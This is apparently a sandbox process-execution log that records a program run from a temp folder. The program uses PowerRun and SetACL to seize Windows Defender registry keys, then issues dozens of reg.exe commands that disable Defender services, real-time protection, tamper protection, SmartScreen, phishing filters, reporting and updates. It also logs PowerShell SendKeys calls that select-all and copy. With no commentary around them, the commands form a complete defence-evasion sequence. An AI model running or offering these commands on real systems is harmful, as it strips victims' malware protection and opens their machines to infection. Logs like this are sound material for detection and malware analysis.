"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Get-MpPreference"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do64.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

